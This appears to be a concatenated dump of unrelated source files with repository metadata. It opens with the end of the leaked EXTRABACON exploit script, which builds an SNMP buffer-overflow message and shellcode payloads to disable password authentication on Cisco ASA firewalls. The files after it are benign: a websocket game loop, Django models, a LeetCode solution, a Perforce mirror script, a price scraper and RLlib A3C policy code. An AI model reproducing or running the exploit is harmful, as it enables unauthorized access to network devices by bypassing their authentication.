print "appended PMCHECK_DISABLE payload " + binascii.hexlify(sc.payload_PMCHECK_DISABLE_byte)
payload += sc.payload_AAAADMINAUTH_DISABLE_byte
print "appended AAAADMINAUTH_DISABLE payload " + binascii.hexlify(sc.payload_AAAADMINAUTH_DISABLE_byte)
elif self.params.mode == "pass-enable":
payload += sc.payload_PMCHECK_ENABLE_byte
print "appended PMCHECK_ENABLE payload " + binascii.hexlify(sc.payload_PMCHECK_ENABLE_byte)
payload += sc.payload_AAAADMINAUTH_ENABLE_byte
print "appended AAAADMINAUTH_ENABLE payload " + binascii.hexlify(sc.payload_AAAADMINAUTH_ENABLE_byte)
else:
return None ##
payload += "\xc3" ##
return payload
def generate_exploit(self):
##
if not self.params.mode:
print "[-] no mode selected!"
sys.exit(1)
print "[+] generating exploit for exec mode %s" % self.params.mode
if self.key_data.lower() == "unsupported":
print "[-] unsupported target version, abort"
sys.exit(1)
if os.path.exists(sc_dir):
print "[-] building shellcode in %s" % sc_dir
sys.path.insert(0, sc_dir)
print "[+] calling make on shellcode for target version"
if not self.build_shellcode():
print "[-] problem building shellcode"
sys.exit(1)
elif os.path.exists(vers_dir):
print "[+] using shellcode in %s" % vers_dir
sys.path.insert(0, vers_dir)
else:
print "[-] cannot find %s or %s" % (sc_dir, vers_dir)
sys.exit(1)
self.sc_filename = "shellcode_%s" % self.key_data.lower()
print "[+] importing version-specific shellcode %s" % self.sc_filename
try:
sc = __import__(self.sc_filename)
except:
print "[-] problem importing version-specific shellcode from %s" % self.sc_filename
sys.exit(1)
##
##
##
##
head = '1.3.6.1.4.1.9.9.491.1.3.3.1.1.5.9'
head_len = len(head.split('.'))
##
##
##
##
##
wrapper = sc.preamble_snmp
if self.params.msg:
wrapper += "." + sc.successmsg_snmp
wrapper += "." + sc.launcher_snmp
wrapper += "." + sc.postscript_snmp
##
wrapper_len = len(wrapper.split('.'))
wrapper += ".144" * (82 - wrapper_len)
wrapper_len = len(wrapper.split('.'))
##
##
##
##
##
overflow = string.join([head, "95", wrapper, sc.my_ret_addr_snmp, sc.finder_snmp], ".")
overflow_len = head_len + 1 + wrapper_len + sc.my_ret_addr_len + sc.finder_len
##
##
##
##
if overflow_len != len(overflow.split('.')):
print "[-] problem with computed (%d) vs actual overflow len (%d)" % (overflow_len, len(overflow.split('.')))
sys.exit(1)
if overflow_len != 112:
print "[-] problem with overflow_len (%d != 112)" % overflow_len
sys.exit(1)
if head_len != 16:
print "[-] problem with head_len (%d != 16)" % head_len
sys.exit(1)
##
##
##
##
##
##
##
##
print "[+] building payload for mode %s" % self.params.mode
payload = self.build_payload(sc)
if not payload:
print "[-] problem building payload"
sys.exit(1)
self.params.request_id = random.randint(0x80000, 0x1fffffff)
print "[+] random SNMP request-id %d" % self.params.request_id
##
exba_msg = SNMP(version=self.params.version,
community=self.params.community,
PDU=SNMPbulk(id=ASN1_INTEGER(self.params.request_id),
max_repetitions=1,
varbindlist=[SNMPvarbind(oid=ASN1_OID("1.3.6.1.2.1.1.1"),
value=ASN1_STRING(payload)),
SNMPvarbind(oid=ASN1_OID(overflow)),
]
)
)
##
##
##
##
##
##
##
offset = exba_msg.__str__().find(payload)
print "[+] fixing offset to payload %d" % offset
overflow = string.replace(overflow, "4.1.255.208", ("4.%d.255.208" % offset), 1)
##
exba_msg = SNMP(version=self.params.version,
community=self.params.community,
PDU=SNMPbulk(id=ASN1_INTEGER(self.params.request_id),
max_repetitions=1,
varbindlist=[SNMPvarbind(oid=ASN1_OID("1.3.6.1.2.1.1.1"),
value=ASN1_STRING(payload)),
SNMPvarbind(oid=ASN1_OID(overflow)),
]
)
)
if self.params.verbose:
print "overflow (%d): %s" % (overflow_len, overflow)
print "payload (%d): %s" % (len(payload), binascii.hexlify(payload))
print "EXBA msg (%d): %s" % (len(exba_msg), binascii.hexlify(exba_msg[SNMP].__str__()))
##
if len(exba_msg) >= 512:
print "[-] final SNMP msg is too large (%d >= %d) abort" % (len(exba_msg), 512)
sys.exit(1)
##
##
##
ret_list = [exba_msg]
return(ret_list)
def post_exploit(self, response):
##
##
snmp = SNMP(response)
print "[+] response:"
snmp.show()
recv_id = int(snmp.PDU.id.val)
if recv_id == self.params.request_id:
print "[+] received SNMP id %d, matches random id sent, likely success" % recv_id
return True
else:
print "[-] received SNMP id %d, expecting %d, mismatch! This is probably bad" % (recv_id, self.params.request_id)
return False
if __name__ == '__main__':
exp = Extrabacon('Extrabacon', '1.1.0.1')
exp.launch(sys.argv)
|
DarthMaulware/EquationGroupLeaks
|
Leak #1 - Equation Group Cyber Weapons Auction - Invitation/EQGRP-Free-File/Firewall/EXPLOITS/EXBA/extrabacon_1.1.0.1.py
|
Python
|
unlicense
| 14,497
|
import asyncio
from aiohttp import web
async def handle(request):
index = open("index.html", 'rb')
content = index.read()
return web.Response(body=content, content_type='text/html')
async def wshandler(request):
app = request.app
ws = web.WebSocketResponse()
await ws.prepare(request)
app["sockets"].append(ws)
while 1:
msg = await ws.receive()
if msg.tp == web.MsgType.text:
print("Got message %s" % msg.data)
ws.send_str("Pressed key code: {}".format(msg.data))
elif msg.tp == web.MsgType.close or\
msg.tp == web.MsgType.error:
break
app["sockets"].remove(ws)
print("Closed connection")
return ws
async def game_loop(app):
while 1:
for ws in app["sockets"]:
ws.send_str("game loop says: tick")
await asyncio.sleep(2)
app = web.Application()
app["sockets"] = []
asyncio.ensure_future(game_loop(app))
app.router.add_route('GET', '/connect', wshandler)
app.router.add_route('GET', '/', handle)
web.run_app(app)
|
7WebPages/snakepit-game
|
simple/game_loop_basic.py
|
Python
|
unlicense
| 1,070
|
from django.db import models
from django.conf import settings
from django.contrib.auth.models import User
class Profile(models.Model):
user = models.OneToOneField(
settings.AUTH_USER_MODEL,
on_delete=models.CASCADE
)
date_of_birth = models.DateField(blank=True, null=True)
photo = models.ImageField(upload_to='users/%Y/%m/%d/', blank=True)
def __str__(self):
return 'Profile for user {}'.format(self.user.username)
class Contact(models.Model):
user_from = models.ForeignKey('auth.User', related_name='rel_from_set',
on_delete=models.CASCADE)
user_to = models.ForeignKey('auth.User', related_name='rel_to_set',
on_delete=models.CASCADE)
created = models.DateTimeField(auto_now_add=True, db_index=True)
class Meta:
ordering = ('-created', )
def __str__(self):
return '{} follows {}'.format(self.user_from, self.user_to)
User.add_to_class(
'following',
models.ManyToManyField(
'self',
through=Contact,
related_name='followers',
symmetrical=False
)
)
|
ch1huizong/dj
|
bookmarks/account/models.py
|
Python
|
unlicense
| 1,147
|
# uncompyle6 version 2.9.10
# Python bytecode 2.7 (62211)
# Decompiled from: Python 3.6.0b2 (default, Oct 11 2016, 05:27:10)
# [GCC 6.2.0 20161005]
# Embedded file name: fix_methodattrs.py
"""Fix bound method attributes (method.im_? -> method.__?__).
"""
from .. import fixer_base
from ..fixer_util import Name
MAP = {'im_func': '__func__',
'im_self': '__self__',
'im_class': '__self__.__class__'
}
class FixMethodattrs(fixer_base.BaseFix):
BM_compatible = True
PATTERN = "\n power< any+ trailer< '.' attr=('im_func' | 'im_self' | 'im_class') > any* >\n "
def transform(self, node, results):
attr = results['attr'][0]
new = unicode(MAP[attr.value])
attr.replace(Name(new, prefix=attr.prefix))
|
DarthMaulware/EquationGroupLeaks
|
Leak #5 - Lost In Translation/windows/Resources/Python/Core/Lib/lib2to3/fixes/fix_methodattrs.py
|
Python
|
unlicense
| 746
|
#!/usr/bin/env python
from efl import evas
import unittest
class TestLineBasics(unittest.TestCase):
def setUp(self):
self.canvas = evas.Canvas(method="buffer",
size=(400, 500),
viewport=(0, 0, 400, 500))
self.canvas.engine_info_set(self.canvas.engine_info_get())
def tearDown(self):
self.canvas.delete()
del self.canvas
def testConstructor(self):
o = evas.Line(self.canvas, start=(10, 20), end=(30, 40))
self.assertEqual(type(o), evas.Line)
self.assertEqual(o.start_get(), (10, 20))
self.assertEqual(o.end_get(), (30, 40))
if __name__ == '__main__':
unittest.main(verbosity=2)
evas.shutdown()
|
maikodaraine/EnlightenmentUbuntu
|
bindings/python/python-efl/tests/evas/test_07_object_line.py
|
Python
|
unlicense
| 752
|
import unittest
from typing import List
import utils
# O(len(nums1) * len(nums2)) time. O(1) space. Monotone stack, hash table.
class Solution:
def nextGreaterElement(self, nums1: List[int], nums2: List[int]) -> List[int]:
result = []
for num in nums1:
index = nums2.index(num)
for i in range(index + 1, len(nums2)):
if nums2[i] > num:
result.append(nums2[i])
break
else:
result.append(-1)
return result
class Test(unittest.TestCase):
def test(self):
cases = utils.load_test_json(__file__).test_cases
for case in cases:
args = str(case.args)
actual = Solution().nextGreaterElement(**case.args.__dict__)
self.assertEqual(case.expected, actual, msg=args)
if __name__ == '__main__':
unittest.main()
|
chrisxue815/leetcode_python
|
problems/test_0496_brute_force.py
|
Python
|
unlicense
| 903
|
#!/usr/bin/env python
# -*- Mode: Python; indent-tabs-mode: nil; tab-width: 4 -*-
# vi: set ts=4 sw=4 expandtab: (add to ~/.vimrc: set modeline modelines=5)
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this file,
# You can obtain one at http://mozilla.org/MPL/2.0/.
# Gist of the script flow:
# 1. read in what the last mirror point was from an external file
# 2. get a list of changes from p4 since that last change
# 3. in tamarin do a pull update (in the event there was a change outside of p4)
# 4. loop over the changes:
# a. sync to the change
# b. capture the p4 commit message, user, date and CL#
# c. rm everything in tamarin minus .hg/
# d. copy everything from p4 clientspace into tamarin MINUS tamarin-merge.txt
# e. hg commit using p4 message (append CL# to message), p4 user and p4 date if possible
# f. hg push this change (this will make sure that if there is another change available
# that for some reason bombs out, we have at least pushed to mozilla what we could)
# g. rewrite the external tracking file with this CL#
# h. if the push fails....
# Information on how to setup the host of this script can
# be found @ https://zerowing.corp.adobe.com/x/QwU5JQ
from __future__ import absolute_import, print_function
import os, marshal, sys, subprocess, shutil, tempfile
import datetime, pytz
from subprocess import Popen, PIPE
class P4Mirror():
# Required config information:
# tamarin-redux repo location
TAMARIN_REPO=os.getenv('TAMARIN_REPO')
LASTBUILD_FILE="lastbuild.txt"
P4ROOT=os.getenv('P4ROOT')
P4USER=os.getenv('P4USER')
P4CLIENT=os.getenv('P4CLIENT')
P4PORT=os.getenv('P4PORT')
P4AVMPLUS=os.getenv('P4AVMPLUS')
OLDHEAD=0
HEAD=0
script_dir="./"
env=os.environ
def __init__(self):
# Ensure that all necessary env variables have been configure
self.checkConfig()
self.log("Read in last mirror point")
self.getLastMirror()
self.log("\t%s\n" % self.OLDHEAD)
self.log("Get the current HEAD")
self.getCurrentHead()
self.log("\t%s\n" % self.HEAD)
self.log("Get changes from Perforce")
changes=self.getChanges()
self.log("Found %s changes to process..." % len(changes))
if len(changes) == 0:
sys.exit(0)
self.log("Sync the hg mirror repo")
self.syncHGRepo()
self.log("\n")
self.log("Process Changes")
self.processChanges(changes)
def checkConfig(self):
exit=False
# Ensure that all necessary env variables have been configure
if self.TAMARIN_REPO == None:
self.log("TAMARIN_REPO is not set")
exit=True
if self.LASTBUILD_FILE == None:
self.log("LASTBUILD_FILE is not set")
exit=True
if self.P4ROOT == None:
self.log("P4ROOT is not set")
exit=True
if self.P4USER == None:
self.log("P4USER is not set")
exit=True
if self.P4CLIENT == None:
self.log("P4CLIENT is not set")
exit=True
if self.P4PORT == None:
self.log("P4PORT is not set")
exit=True
if self.P4AVMPLUS == None:
self.log("P4AVMPLUS is not set")
exit=True
if exit:
sys.exit(1)
# Do a quick sanity check to make sure that self.TAMARIN_REPO/.hg/hgrc exists
# before we start deleting items from this location later in processChanges()
if not os.path.exists(self.TAMARIN_REPO+"/.hg/store"):
self.log("TAMARIN_REPO does not contain a proper mercurial repo")
self.log("TAMARIN_REPO: %s" % self.TAMARIN_REPO)
sys.exit(1)
if not os.path.exists(self.LASTBUILD_FILE):
self.log("LASTBUILD_FILE does not exist")
self.log("LASTBUILD_FILE: %s" % self.LASTBUILD_FILE)
sys.exit(1)
def getLastMirror(self):
# read last mirror changelist
bf=open(self.LASTBUILD_FILE, 'r')
for line in bf:
self.OLDHEAD = int(line)
bf.close()
def getCurrentHead(self):
stdout, stderr, exit = self.run_pipe(cmd="p4 counter change", env=self.env)
for line in stdout:
self.HEAD = int(line)
if stderr:
for line in stderr:
self.log(line)
if exit:
sys.exit(exit)
def getChanges(self):
changes = []
# Actually need to get all of the changes from OLDHEAD+1 to HEAD
cmd = "p4 -G changes -s submitted //%s/...@%s,%s" % (self.P4CLIENT, self.OLDHEAD+1, self.HEAD)
pipe = Popen( cmd.split(), stdout=PIPE).stdout
try: # The -G option on p4 returns a python object, so need to be loaded via marshal.load()
while 1:
record = marshal.load( pipe )
changes.append( record )
except EOFError:
pass
pipe.close()
# Need to loop backwards through this list as the latest changes is at the start
changes.reverse()
return changes
def syncHGRepo(self):
# Script being really paranoid about local changes....
cmd = "hg revert --all"
stdout, stderr, exit = self.run_pipe(cmd=cmd, cwd=self.TAMARIN_REPO, env=self.env)
for line in stdout:
self.log(line)
if stderr:
for line in stderr:
self.log(line)
if exit:
sys.exit(exit)
# Script being really paranoid about local changes....
cmd = "hg purge"
stdout, stderr, exit = self.run_pipe(cmd=cmd, cwd=self.TAMARIN_REPO, env=self.env)
for line in stdout:
self.log(line)
if stderr:
for line in stderr:
self.log(line)
if exit:
sys.exit(exit)
cmd = "hg pull"
stdout, stderr, exit = self.run_pipe(cmd=cmd, cwd=self.TAMARIN_REPO, env=self.env)
for line in stdout:
self.log(line)
if stderr:
for line in stderr:
self.log(line)
if exit:
sys.exit(exit)
cmd = "hg update -C -r tip"
stdout, stderr, exit = self.run_pipe(cmd=cmd, cwd=self.TAMARIN_REPO, env=self.env)
for line in stdout:
self.log(line)
if stderr:
for line in stderr:
self.log(line)
if exit:
sys.exit(exit)
def processChanges(self, changes):
'''
Loop over the changes:
a. sync to the change
b. capture the p4 commit message, user, date and CL#
c. rm everything in tamarin minus .hg/
d. copy everything from p4 clientspace into tamarin MINUS tamarin-merge.txt
e. hg commit using p4 message (append CL# to message), p4 user and p4 date if possible
f. hg push this change (this will make sure that if there is another change available
that for some reason bombs out, we have at least pushed to mozilla what we could)
g. if the push fails....
h. rewrite the external tracking file with this CL#
'''
user=''
changelist=''
desc=''
date=''
for dict in changes:
changelist = dict["change"]
self.log("\nProcessing changelist: %s" % changelist)
#########################################
# a. sync to the change
#########################################
self.log("Sync to the change...")
cmd = "p4 sync %s@%s" % (self.P4AVMPLUS, changelist)
stdout, stderr, exit = self.run_pipe(cmd=cmd, env=self.env)
for line in stdout:
self.log(line)
if stderr:
for line in stderr:
self.log(line)
if exit:
sys.exit(exit)
#########################################
# b. capture the p4 commit message, user,
# date and CL#
#########################################
cmd = "p4 -G describe -s %s" % (dict["change"])
pipe = Popen( cmd.split(), stdout=PIPE).stdout
try: # The -G option on p4 returns a python object, so need to be loaded via marshal.load()
while 1:
record = marshal.load( pipe )
except EOFError:
pass
pipe.close()
user = record["user"]
date = record["time"]
desc = record["desc"]
cmd = "p4 -G user -o %s" % (user)
pipe = Popen( cmd.split(), stdout=PIPE).stdout
try: # The -G option on p4 returns a python object, so need to be loaded via marshal.load()
while 1:
record = marshal.load( pipe )
except EOFError:
pass
pipe.close()
user = "%s <%s>" % (record["FullName"], record["Email"])
#########################################
# c. rm everything in tamarin minus .hg/
#########################################
self.log("Clean out the mirror repo...")
for filename in os.listdir(self.TAMARIN_REPO):
fullpath = "%s/%s" % (self.TAMARIN_REPO, filename)
if filename != ".hg":
if os.path.isfile(fullpath):
os.unlink(fullpath)
else:
shutil.rmtree(fullpath)
#########################################
# d. copy everything from p4 clientspace into tamarin
#########################################
self.log("Repopulate the mirror repo from p4 workspace...")
for filename in os.listdir(self.P4ROOT):
src = "%s/%s" % (self.P4ROOT, filename)
dest = "%s/%s" % (self.TAMARIN_REPO, filename)
if os.path.isfile(src):
shutil.copy2(src, dest)
else:
shutil.copytree(src, dest)
#########################################
# e. hg commit using p4 message (append CL# to message),
# p4 user and p4 date if possible
#########################################
self.log("Commit the change to the mirror repo...")
commit_message = desc + "\nCL@" + changelist
fd, temp_path = tempfile.mkstemp()
os.write(fd, commit_message)
os.close(fd)
# Massage the date
d = datetime.datetime.fromtimestamp(float(date), pytz.timezone("US/Pacific"))
date = d.strftime("%a %b %d %H:%M:%S %Y %z")
cmd = "hg commit --addremove --user \"%s\" --date \"%s\" --logfile %s" % (user, date, temp_path)
self.log(cmd)
stdout, stderr, exit = self.run_pipe(cmd=cmd, cwd=self.TAMARIN_REPO, env=self.env)
for line in stdout:
self.log(line)
if stderr:
for line in stderr:
self.log(line)
if exit:
sys.exit(exit)
# Make sure to remove the temp file
os.unlink(temp_path)
#########################################
# f. hg push this change (this will make sure that if
# there is another change available that for some
# reason bombs out, we have at least pushed to mozilla
# what we could)
#########################################
self.log("Push the change to the mirror repo...")
cmd = "hg push"
stdout, stderr, exit = self.run_pipe(cmd=cmd, cwd=self.TAMARIN_REPO, env=self.env)
for line in stdout:
self.log(line)
#########################################
# g. if the push fails....
#########################################
if stderr:
for line in stderr:
self.log(line)
if exit:
sys.exit(exit)
#########################################
# h. rewrite the external tracking file with this CL#
#########################################
self.log("Update changelist tracking file...")
bf=open(self.LASTBUILD_FILE, 'w')
bf.write(changelist)
bf.close()
self.log("Completed changelist: %s\n\n#########################################" % changelist)
def run_pipe(self, cmd, cwd=None, env=None):
if cwd==None:
cwd=self.script_dir
# run a command and return a tuple of (output, exitCode)
if env==None:
process = subprocess.Popen(cmd, cwd=cwd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
else:
process = subprocess.Popen(cmd, cwd=cwd, shell=True, env=env, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
(output, err) = process.communicate()
output = output.split('\n') if output else []
if output and output[-1].strip() == '': # strip empty line at end
output = output[:-1]
exitCode = process.returncode
#process.close()
return (output, err, exitCode)
def log(self, str):
print(str)
if __name__ == "__main__":
f=P4Mirror()
|
keyhom/avm2pluscc_avm2
|
avmplus/build/buildscripts/utils/avm_mirror.py
|
Python
|
unlicense
| 13,613
|
"""
Recently I have seen this article http://habrahabr.ru/post/200190/
so I have decided to find the solution of this task by myself.
Short description of this task for a case if the link above will be broken:
1. we have a two-dimensional positive integer numbers array
2. if we will display this data in the manner of a walls (see image below)
then we need to calculate the volume which could be filled by an imaginary water ?
___ ___
|7 7|_ |7 7|_
_ | 6| _ | 6|
|5| | | fill with water |5|x x x x x| | volume is
| | _ | | ----------------> | |x x x x x| | -----------> 19
_| | |3| _ | | _| |x|3|x x x| |
|2 |_| |_|2|_| | |2 |x| |x|2|x| |
|____1___1___1______| |____1___1___1______|
0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9
My solution is:
1. We are moving step by step from left to right.
2. If we are stepping down then we put the previous cell value with the current cell index into stack.
3. If we are stepping up then:
3.1. We are popping one value from the stack and flood all cells between stacked index and current step index up to
the floodLevel = min(stackedValue, currentValue).
3.2. Increase Result value in the next way:
result += (currentStepIndex - stackedIndex) * (min(stackedValue, currentValue) - prevValue)
3.3. calculate difference between currentValue and stackedValue. If the currentValue > stackedValue then pop next
value from the stack and repeat steps (3.1 - 3.3). If the currentValue < stackedValue then put this stackedValue
with its stackedIndex back to stack.
That's all, we will always have a filled holes from the left, and the highest wall which we were visited before will be
always stored on the bottom of this stack (of course if it wasn't already filled up to its edge, in that case the stack
would be empty).
"""
import random
def generateData():
""" Generates source data for this exercise """
# data = [2, 5, 1, 3, 1, 2, 1, 7, 7, 6]
data = [int(10 * random.random()) for i in xrange(10)]
return data
def calculate(data):
""" Main program algorithm with some debug instruments """
stack = []
result = 0
prevVal = 0
filledCells = {} # for debug purpose only
for col in range(0, len(data)):
val = data[col]
if val < prevVal:
stack.append((col, prevVal))
elif val > prevVal:
while len(stack) > 0 and val > prevVal:
stackItem = stack.pop(-1) if val >= stack[-1][1] else stack[-1]
floodLevel = min(val, stackItem[1])
result += (col - stackItem[0]) * (floodLevel - prevVal)
if __debug__:
for row, cell in [(row, cell) for row in range(prevVal, floodLevel) for cell in range(stackItem[0], col)]:
filledCells[row, cell] = True
display(data, filledCells, col, stack, result)
prevVal = floodLevel
prevVal = val
display(data, filledCells, col, stack, result)
def display(data, filledCells, step, stack, result):
""" Renders current state of program execution in a human readable format """
maxValue = max(data)
colCount = len(data)
valueWidth = len(str(maxValue))
stackHeight = 5
text = ''
for row in range(maxValue + 1, -1, -1):
emptyFill = '_' if row == 0 else ' '
line = ''
line += '|' if data[0] > row else emptyFill # put left side of first column
for col in range(0, colCount):
# fill inner column space
if filledCells.has_key((row, col)): # fill cell with water
line += ('{:' + emptyFill + '^' + str(valueWidth) + '}').format('x')
elif data[col] == row + 1:
line += ('{:' + emptyFill + '>' + str(valueWidth) + '}').format(data[col])
elif data[col] == row:
line += '_' * valueWidth
else:
line += emptyFill * valueWidth
# add right column border
if ((col < colCount - 1 and (data[col] <= row < data[col + 1] or data[col] > row >= data[col + 1]))
or (col == colCount - 1 and data[col] > row)):
line += '|'
elif col < colCount - 1 and data[col] == data[col + 1] == row:
line += '_'
else:
line += emptyFill
text += line + '\n'
# fill bottom row with an indexes of array
for col in range(0, colCount):
text += (' {:>' + str(valueWidth) + '}').format(col)
text += ' \n'
# add current step indicator
for col in range(0, colCount):
text += (' {:^' + str(valueWidth) + '}').format('^' if col == step else ' ')
text += " \n"
# render stack
text += '\nstack:\n'
colIndexWidth = len(str(len(data)))
for row in range(max(len(stack), stackHeight), -1, -1):
if row >= len(stack):
text += '[' + (' ' * (colIndexWidth + valueWidth + 4)) + ']\n'
elif row == 0:
text += ('[_{0:_>' + str(colIndexWidth) + '},_{1:_>' + str(valueWidth) + '}_]\n').format(stack[row][1], stack[row][0])
else:
text += ('[ {0:>' + str(colIndexWidth) + '}, {1:>' + str(valueWidth) + '} ]\n').format(stack[row][1], stack[row][0])
# render sum
text += '\nresult = {0}'.format(result)
print text
if __name__ == '__main__':
data = generateData()
calculate(data)
|
tigeral/polygon
|
python/habra_task/habratask_main.py
|
Python
|
unlicense
| 5,696
|
# encoding: utf-8
'''
Created on 2015年3月15日
@author: Sunday
'''
from twisted.web.resource import Resource
root = Resource()
if __name__ == '__main__':
pass
else:
__all__ = ['factory', ]
|
alexsunday/pyvpn
|
src/webconsole.py
|
Python
|
unlicense
| 217
|
#!/usr/bin/python
# coding: utf-8
try:
from bs4 import BeautifulSoup
import ConfigParser as cp
import requests, re, sys
import MySQLdb as sql
except Val:
print "Error importing modules, exiting."
exit()
# Import database credentials from secured config file
config = cp.RawConfigParser()
config.read('/var/www-secret/config.ini')
db_user = config.get('database','username')
db_pass = config.get('database','password')
db_name = config.get('database','database')
# Open database connection
db = sql.connect("localhost",db_user,db_pass,db_name)
# prepare db cursor
cursor = db.cursor()
def db_getproducts():
# List of product URLs to scan prices for. Supports Heureka.cz only.
# gets list of products, each item is (id,url)
cursor.execute("SELECT id,code,name FROM products")
products = cursor.fetchall()
return products
def db_getshops():
# This version of beta uses the shop_link table, allowing each product to use different shops
BETA_args = """
SELECT shops.code
FROM shops
LEFT JOIN shop_link
ON shops.id = shop_link.shop_id
WHERE shop_link.product_id = ???
"""
# For now, lets use all shops for all products.
args = """
SELECT id,code
FROM shops
"""
cursor.execute(args)
shops = cursor.fetchall()
print "Shops from DB: ", shops
return shops
# Scraping function scans 'urls' list and collects prices for items in 'shops' list.
# Returns list in format [product:[]
def db_getprices(products):
results = [] # Setup empty list where dictionaries of products will be stored
results_sql = []
db_shops = db_getshops()
# Product/URL loop
for product in products:
shops = list(db_shops)
# Get list of shops
# shops = db_getshops()
# Get html data from products page
url = product[1] + "?expand=1#!o=4"
html = requests.get(url).text
soup = BeautifulSoup(html, 'html.parser')
# Get fancy product name
item_name = soup.h1.string
# Find button with price and shop name code
items = soup.select("a.pricen")
# RESULTS = [{productA:[{shopA1:priceA1},{shop2:price2}]},{productB:[{shopB1:priceB1},{shopB2:priceB2}]}]
prices = {}
result = { item_name : prices }
# Go through each buy button, check if link is in shop list, convert price to int, append to results.
for item in items:
for shop in shops:
if shop[1] in item.get('href'):
shops.pop(shops.index(shop))
price = re.sub("[^0-9]","",item.text)
# product ID, shop ID, date, price
result = (product[0],shop[0],price)
results_sql.append(result)
return results_sql
def db_insertprices(data):
# Prepare general statement for insertin data from array
stmt = """
INSERT INTO prices(product_id, shop_id, date, price)
VALUES (%s,%s,CURDATE(),%s)
"""
# Try to insert data into DB
try:
print data
cursor.executemany(stmt, data)
db.commit()
print "New prices successfuly inserted into database"
except:
db.rollback()
def db_addproduct(url):
# Add a new product to the list by passing its Heureka URL.
# Get html data from url and parse it
html = requests.get(url).text
soup = BeautifulSoup(html, 'html.parser')
# Get fancy product name
item_name = soup.h1.string
# Get current products to check if already exists
product = [product[2] for product in db_getproducts()]
if item_name in product:
print "This product is already in the list"
return
# If it isnt, lets continue
sql = """
INSERT INTO products(code,name)
VALUES ("%s", "%s")
""" % (url, item_name)
# Try to execute and commit
try:
cursor.execute(sql)
db.commit()
except: # Rollback if shit hits the fan
db.rollback()
print "%s has been added." % item_name
return
def cron():
# Get prices for products for all shops
data = db_getprices(db_getproducts())
# Insert prices into DB
db_insertprices(data)
def add_product():
db_addproduct(sys.argv[2])
def help():
print """
core.py [option] [arg]
[option]:
add_product - Add new product, requires [arg] with URL of Heureka page
cron - Cron task to get prices and insert them into DB
dev - Runs a test scrape, prints prices to terminal only.
"""
def dev():
data = db_getproducts()
print data
data2 = db_getprices(data)
print data2
if __name__ == '__main__':
globals()[sys.argv[1]]()
#new_product = str(raw_input("Heureka URL:"))
#db_addproduct(new_product)
|
vkotek/PriceDog
|
core.py
|
Python
|
unlicense
| 4,867
|
from ctypes import cdll
lib = cdll.LoadLibrary("target/release/libembed.dylib")
lib.process()
print("done!")
|
amitsaha/learning
|
rust/embed/embed.py
|
Python
|
unlicense
| 112
|
"""Note: Keep in sync with changes to VTraceTFPolicy."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import ray
from ray.rllib.policy.sample_batch import SampleBatch
from ray.rllib.utils.explained_variance import explained_variance
from ray.rllib.evaluation.postprocessing import compute_advantages, \
Postprocessing
from ray.rllib.policy.tf_policy_template import build_tf_policy
from ray.rllib.policy.tf_policy import LearningRateSchedule
from ray.rllib.utils import try_import_tf
tf = try_import_tf()
class A3CLoss(object):
def __init__(self,
action_dist,
actions,
advantages,
v_target,
vf,
vf_loss_coeff=0.5,
entropy_coeff=0.01):
log_prob = action_dist.logp(actions)
# The "policy gradients" loss
self.pi_loss = -tf.reduce_sum(log_prob * advantages)
delta = vf - v_target
self.vf_loss = 0.5 * tf.reduce_sum(tf.square(delta))
self.entropy = tf.reduce_sum(action_dist.entropy())
self.total_loss = (self.pi_loss + self.vf_loss * vf_loss_coeff -
self.entropy * entropy_coeff)
def actor_critic_loss(policy, batch_tensors):
policy.loss = A3CLoss(
policy.action_dist, batch_tensors[SampleBatch.ACTIONS],
batch_tensors[Postprocessing.ADVANTAGES],
batch_tensors[Postprocessing.VALUE_TARGETS],
policy.convert_to_eager(policy.vf), policy.config["vf_loss_coeff"],
policy.config["entropy_coeff"])
return policy.loss.total_loss
def postprocess_advantages(policy,
sample_batch,
other_agent_batches=None,
episode=None):
completed = sample_batch[SampleBatch.DONES][-1]
if completed:
last_r = 0.0
else:
next_state = []
for i in range(len(policy.model.state_in)):
next_state.append([sample_batch["state_out_{}".format(i)][-1]])
last_r = policy._value(sample_batch[SampleBatch.NEXT_OBS][-1],
sample_batch[SampleBatch.ACTIONS][-1],
sample_batch[SampleBatch.REWARDS][-1],
*next_state)
return compute_advantages(sample_batch, last_r, policy.config["gamma"],
policy.config["lambda"])
def add_value_function_fetch(policy):
return {SampleBatch.VF_PREDS: policy.vf}
class ValueNetworkMixin(object):
def __init__(self):
self.vf = self.model.value_function()
def _value(self, ob, prev_action, prev_reward, *args):
feed_dict = {
self.get_placeholder(SampleBatch.CUR_OBS): [ob],
self.get_placeholder(SampleBatch.PREV_ACTIONS): [prev_action],
self.get_placeholder(SampleBatch.PREV_REWARDS): [prev_reward],
self.model.seq_lens: [1]
}
assert len(args) == len(self.model.state_in), \
(args, self.model.state_in)
for k, v in zip(self.model.state_in, args):
feed_dict[k] = v
vf = self.get_session().run(self.vf, feed_dict)
return vf[0]
def stats(policy, batch_tensors):
return {
"cur_lr": tf.cast(policy.cur_lr, tf.float64),
"policy_loss": policy.loss.pi_loss,
"policy_entropy": policy.loss.entropy,
"var_gnorm": tf.global_norm(policy.var_list),
"vf_loss": policy.loss.vf_loss,
}
def grad_stats(policy, grads):
return {
"grad_gnorm": tf.global_norm(grads),
"vf_explained_var": explained_variance(
policy.get_placeholder(Postprocessing.VALUE_TARGETS), policy.vf),
}
def clip_gradients(policy, optimizer, loss):
grads = tf.gradients(loss, policy.var_list)
grads, _ = tf.clip_by_global_norm(grads, policy.config["grad_clip"])
clipped_grads = list(zip(grads, policy.var_list))
return clipped_grads
def setup_mixins(policy, obs_space, action_space, config):
ValueNetworkMixin.__init__(policy)
LearningRateSchedule.__init__(policy, config["lr"], config["lr_schedule"])
policy.var_list = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES,
tf.get_variable_scope().name)
A3CTFPolicy = build_tf_policy(
name="A3CTFPolicy",
get_default_config=lambda: ray.rllib.agents.a3c.a3c.DEFAULT_CONFIG,
loss_fn=actor_critic_loss,
stats_fn=stats,
grad_stats_fn=grad_stats,
gradients_fn=clip_gradients,
postprocess_fn=postprocess_advantages,
extra_action_fetches_fn=add_value_function_fetch,
before_loss_init=setup_mixins,
mixins=[ValueNetworkMixin, LearningRateSchedule])
|
atumanov/ray
|
python/ray/rllib/agents/a3c/a3c_tf_policy.py
|
Python
|
apache-2.0
| 4,762
|
